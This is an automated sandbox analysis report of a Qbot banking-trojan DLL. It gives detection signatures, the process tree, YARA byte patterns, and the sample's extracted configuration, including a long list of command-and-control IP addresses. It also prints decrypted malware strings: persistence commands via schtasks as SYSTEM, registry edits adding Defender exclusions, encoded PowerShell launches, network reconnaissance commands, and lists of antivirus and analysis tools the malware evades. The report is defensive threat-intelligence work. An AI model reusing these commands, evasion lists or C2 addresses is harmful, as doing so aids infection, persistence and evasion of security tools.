Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
042_qbot.dll.dll

Overview

General Information

Sample Name:042_qbot.dll.dll
(renamed file extension from dat to dll, renamed because original name is a hash value)
Original Sample Name:042_qbot.dll.dat
Analysis ID:882935
MD5:8c18224b2fcb618bb4305a8687b3bb22
SHA1:c0a9a8cb468d0f9b185fa1112683612c01c60673
SHA256:d93d05a84c4d9579accd5dc839ee9f8f7e7f54c623e37175a59146664530dc3d
Infos:

Detection

Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Qbot
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Sample uses string decryption to hide its real strings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6868 cmdline: loaddll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll" MD5: 3B4636AE519868037940CA5C4272091B)
    • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3680 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1108 cmdline: rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 5804 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5436 cmdline: rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,lcopy_block_row MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 676 cmdline: rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,lcopy_sample_rows MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4144 cmdline: rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,ldiv_round_up MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7048 cmdline: rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lcopy_block_row MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4144 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 7076 cmdline: rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lcopy_sample_rows MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7132 cmdline: rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",ldiv_round_up MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7140 cmdline: rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",next MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 7220 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 2240 cmdline: rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lround_up MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5796 cmdline: rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lpeg_write_tables MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 7076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 660 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
QakBot, qbotQbotQBot is a modular information stealer also known as Qakbot or Pinkslipbot. It has been active for years since 2007. It has historically been known as a banking Trojan, meaning that it steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
  • GOLD CABIN
https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot
{"Bot id": "BB30", "Campaign": "1685686808", "Version": "404.1346", "C2 list": ["86.173.2.12:2222", "92.9.45.20:2222", "100.4.163.158:2222", "213.64.33.92:2222", "75.98.154.19:443", "78.192.109.105:2222", "88.126.94.4:50000", "70.28.50.223:2083", "92.154.17.149:2222", "24.234.220.88:993", "87.252.106.39:995", "174.4.89.3:443", "12.172.173.82:20", "90.29.86.138:2222", "70.160.67.203:443", "223.166.13.95:995", "184.181.75.148:443", "95.45.50.93:2222", "201.143.215.69:443", "64.121.161.102:443", "2.82.8.80:443", "188.28.19.84:443", "81.101.185.146:443", "79.77.142.22:2222", "84.215.202.8:443", "183.87.163.165:443", "74.12.147.139:2078", "74.12.147.139:2222", "74.12.147.139:2222", "74.12.147.139:2083", "70.28.50.223:2078", "94.204.202.106:443", "87.221.153.182:2222", "70.28.50.223:2087", "24.234.220.88:990", "2.49.63.160:2222", "72.205.104.134:443", "199.27.66.213:443", "83.249.198.100:2222", "90.104.151.37:2222", "116.75.63.183:443", "70.28.50.223:2078", "117.195.17.148:993", "77.126.99.230:443", "45.62.70.33:443", "24.234.220.88:465", "203.109.44.236:995", "75.109.111.89:443", "161.142.103.187:995", "77.86.98.236:443", "147.147.30.126:2222", "124.246.122.199:2222", "103.123.223.133:443", "180.151.19.13:2078", "176.142.207.63:443", "12.172.173.82:32101", "103.140.174.20:2222", "70.50.83.216:2222", "12.172.173.82:465", "38.2.18.164:443", "93.187.148.45:995", "70.64.77.115:443", "12.172.173.82:21", "70.49.205.198:2222", "27.0.48.233:443", "12.172.173.82:50001", "83.110.223.61:443", "103.141.50.43:995", "85.101.239.116:443", "103.42.86.42:995", "92.1.170.110:995", "81.229.117.95:2222", "124.122.47.148:443", "103.212.19.254:995", "103.139.242.6:443", "125.99.76.102:443", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "70.28.50.223:32100", "79.168.224.165:2222", "121.121.108.120:995", "69.160.121.6:61201", "200.84.211.255:2222", "201.244.108.183:995", "93.187.148.45:443", "85.61.165.153:2222", "184.182.66.109:443", "175.156.217.7:2222", "70.28.50.223:3389", "114.143.176.236:443", "65.95.141.84:2222", "80.6.50.34:443", "12.172.173.82:2087", "47.199.241.39:443", "66.241.183.99:443", "113.11.92.30:443", "186.75.95.6:443", "125.99.69.178:443", "109.130.247.84:2222", "96.56.197.26:2222", "70.50.1.252:2222", "91.160.70.68:32100", "67.70.120.249:2222", "209.171.160.69:995", "98.163.227.79:443", "176.133.4.230:995", "24.234.220.88:995", "45.62.75.250:443", "200.44.198.47:2222", "173.17.45.60:443", "5.192.141.228:2222", "184.63.133.131:995", "70.28.50.223:2083", "78.82.143.154:2222", "73.88.173.113:443", "181.4.225.225:443", "24.234.220.88:443", "174.58.146.57:443"]}
SourceRuleDescriptionAuthorStrings
0000000F.00000002.393595991.00000000045F0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    0000000F.00000002.393475523.000000000296A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      decrypted.memstrJoeSecurity_QbotYara detected QbotJoe Security
        SourceRuleDescriptionAuthorStrings
        15.2.rundll32.exe.10000000.1.unpackMAL_QakBot_ConfigExtraction_Feb23QakBot Config Extractionkevoreilly
        • 0xec55:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
        • 0xa87b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
        15.2.rundll32.exe.10000000.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          15.2.rundll32.exe.2980960.0.raw.unpackMAL_QakBot_ConfigExtraction_Feb23QakBot Config Extractionkevoreilly
          • 0xec55:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
          • 0xa87b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
          15.2.rundll32.exe.2980960.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
            15.2.rundll32.exe.2980960.0.unpackMAL_QakBot_ConfigExtraction_Feb23QakBot Config Extractionkevoreilly
            • 0xe055:$params: 8B 7D 08 8B F1 57 89 55 FC E8 84 99 FF FF 8D 9E 24 04 00 00 89 03 59 85 C0 75 08 6A FC 58 E9
            • 0x9c7b:$conf: 5F 5E 5B C9 C3 51 6A 00 E8 C1 44 00 00 59 59 85 C0 75 01 C3
            Click to see the 1 entries
            No Sigma rule has matched
            Timestamp:192.168.2.3109.130.247.844971422222404302 06/07/23-01:07:51.615603
            SID:2404302
            Source Port:49714
            Destination Port:2222
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0000000F.00000002.393475523.000000000296A000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Qbot {"Bot id": "BB30", "Campaign": "1685686808", "Version": "404.1346", "C2 list": ["86.173.2.12:2222", "92.9.45.20:2222", "100.4.163.158:2222", "213.64.33.92:2222", "75.98.154.19:443", "78.192.109.105:2222", "88.126.94.4:50000", "70.28.50.223:2083", "92.154.17.149:2222", "24.234.220.88:993", "87.252.106.39:995", "174.4.89.3:443", "12.172.173.82:20", "90.29.86.138:2222", "70.160.67.203:443", "223.166.13.95:995", "184.181.75.148:443", "95.45.50.93:2222", "201.143.215.69:443", "64.121.161.102:443", "2.82.8.80:443", "188.28.19.84:443", "81.101.185.146:443", "79.77.142.22:2222", "84.215.202.8:443", "183.87.163.165:443", "74.12.147.139:2078", "74.12.147.139:2222", "74.12.147.139:2222", "74.12.147.139:2083", "70.28.50.223:2078", "94.204.202.106:443", "87.221.153.182:2222", "70.28.50.223:2087", "24.234.220.88:990", "2.49.63.160:2222", "72.205.104.134:443", "199.27.66.213:443", "83.249.198.100:2222", "90.104.151.37:2222", "116.75.63.183:443", "70.28.50.223:2078", "117.195.17.148:993", "77.126.99.230:443", "45.62.70.33:443", "24.234.220.88:465", "203.109.44.236:995", "75.109.111.89:443", "161.142.103.187:995", "77.86.98.236:443", "147.147.30.126:2222", "124.246.122.199:2222", "103.123.223.133:443", "180.151.19.13:2078", "176.142.207.63:443", "12.172.173.82:32101", "103.140.174.20:2222", "70.50.83.216:2222", "12.172.173.82:465", "38.2.18.164:443", "93.187.148.45:995", "70.64.77.115:443", "12.172.173.82:21", "70.49.205.198:2222", "27.0.48.233:443", "12.172.173.82:50001", "83.110.223.61:443", "103.141.50.43:995", "85.101.239.116:443", "103.42.86.42:995", "92.1.170.110:995", "81.229.117.95:2222", "124.122.47.148:443", "103.212.19.254:995", "103.139.242.6:443", "125.99.76.102:443", "50.68.186.195:443", "47.205.25.170:443", "12.172.173.82:993", "12.172.173.82:22", "70.28.50.223:32100", "79.168.224.165:2222", "121.121.108.120:995", "69.160.121.6:61201", "200.84.211.255:2222", "201.244.108.183:995", "93.187.148.45:443", "85.61.165.153:2222", "184.182.66.109:443", "175.156.217.7:2222", "70.28.50.223:3389", "114.143.176.236:443", "65.95.141.84:2222", "80.6.50.34:443", "12.172.173.82:2087", "47.199.241.39:443", "66.241.183.99:443", "113.11.92.30:443", "186.75.95.6:443", "125.99.69.178:443", "109.130.247.84:2222", "96.56.197.26:2222", "70.50.1.252:2222", "91.160.70.68:32100", "67.70.120.249:2222", "209.171.160.69:995", "98.163.227.79:443", "176.133.4.230:995", "24.234.220.88:995", "45.62.75.250:443", "200.44.198.47:2222", "173.17.45.60:443", "5.192.141.228:2222", "184.63.133.131:995", "70.28.50.223:2083", "78.82.143.154:2222", "73.88.173.113:443", "181.4.225.225:443", "24.234.220.88:443", "174.58.146.57:443"]}
            Source: 042_qbot.dll.dllReversingLabs: Detection: 58%
            Source: 042_qbot.dll.dllVirustotal: Detection: 64%Perma Link
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: error res='%s' err=%d len=%u
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: netstat -nao
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: runas
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ipconfig /all
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: net localgroup
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: nltest /domain_trusts /all_trusts
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Microsoft
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SELF_TEST_1
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: p%08x
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Self test FAILED!!!
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Self test OK.
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: /t5
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: whoami /all
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: cmd
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: microsoft.com,google.com,cisco.com,oracle.com,verisign.com,broadcom.com,yahoo.com,xfinity.com,irs.gov,linkedin.com
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ERROR: GetModuleFileNameW() failed with error: ERROR_INSUFFICIENT_BUFFER
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: route print
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: .lnk
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: "%s\system32\schtasks.exe" /Create /ST %02u:%02u /RU "NT AUTHORITY\SYSTEM" /SC ONCE /tr "%s" /Z /ET %02u:%02u /tn %s
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: arp -a
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %s "$%s = \"%s\"; & $%s"
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: net share
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: cmd.exe /c set
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Self check
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %u;%u;%u;
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: /c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ProfileImagePath
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: at.exe %u:%u "%s" /I
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ProgramData
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Self check ok!
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: powershell.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: qwinsta
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: net view
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%s
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Component_08
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Start screenshot
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: schtasks.exe /Delete /F /TN %u
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: appidapi.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %s \"$%s = \\\"%s\\\\; & $%s\"
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: c:\ProgramData
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Component_07
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: bUdiuy81gYguty@4frdRdpfko(eKmudeuMncueaN
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: powershell.exe -encodedCommand %S
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ERROR: GetModuleFileNameW() failed with error: %u
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: powershell.exe -encodedCommand
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SoNuce]ugdiB3c[doMuce2s81*uXmcvP
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: \System32\WindowsPowerShell\v1.0\powershell.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: error res='%s' err=%d len=%u
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: netstat -nao
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: runas
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ipconfig /all
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %u.%u.%u.%u.%u.%u.%04x
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SystemRoot
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: cscript.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: C:\INTERNAL\__empty
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: .dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_PhysicalMemory
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ALLUSERSPROFILE
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: image/jpeg
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: LocalLow
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: displayName
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: shlwapi.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: CommandLine
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: kernel32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SubmitSamplesConsent
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: 1234567890
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: wbj.go
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_DiskDrive
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: System32
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Name
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: WRSA.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: c:\\
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SpyNetReporting
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: FALSE
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: aswhookx.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Packages
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: application/x-shockwave-flash
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: RepUx.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Winsta0
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: avp.exe;kavtray.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: root\SecurityCenter2
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: MsMpEng.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: userenv.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: csc_ui.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: \\.\pipe\
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: pstorec.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: NTUSER.DAT
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: from
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\sethc.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: netapi32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: gdi32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: setupapi.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: iphlpapi.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Caption
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: CrAmTray.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_ComputerSystem
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: user32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: \sf2.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: egui.exe;ekrn.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Software\Microsoft
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %S.%06d
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: bcrypt.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SELECT * FROM AntiVirusProduct
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: wtsapi32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: shell32.dll
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: TRUE
            Source: 15.2.rundll32.exe.2980960.0.raw.unpackString decryptor: Win32_Bios
